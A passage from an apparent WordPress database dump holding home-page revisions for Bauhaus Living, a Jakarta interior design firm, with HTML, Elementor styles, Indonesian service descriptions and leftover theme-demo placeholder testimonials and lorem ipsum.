107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 10:05:25','2023-09-22 10:05:25','',22,'https://bauhaus.futuremediatrix.com/?p=4928',0,'revision','',0),(4929,3,'2023-09-22 10:05:25','2023-09-22 10:05:25','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!</p><p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.</p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.</p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas. </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								Apa kata mereka tentang Bauhaus?							</h2>\n			<section>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/56947243_2426566684042502_6812443397089918976_n.jpg\" alt=\"Prijonno Nugroho\" >\n																							<p>\n													Prijonno Nugroho												</p>\n																							<p>\n													Action Coach Jakarta												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Kantor kami waktu itu menggunakan jasa dari Bauhaus hasilnnya memuaskan.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 10:05:25','2023-09-22 10:05:25','',22,'https://bauhaus.futuremediatrix.com/?p=4929',0,'revision','',0),(4930,3,'2023-09-22 10:08:59','2023-09-22 10:08:59','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!</p><p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.</p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.</p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas. </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								Apa kata mereka tentang Bauhaus?							</h2>\n			<section>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/56947243_2426566684042502_6812443397089918976_n.jpg\" alt=\"Prijonno Nugroho\" >\n																							<p>\n													Prijonno Nugroho												</p>\n																							<p>\n													Action Coach Jakarta												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Kantor kami waktu itu menggunakan jasa dari Bauhaus hasilnnya memuaskan.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														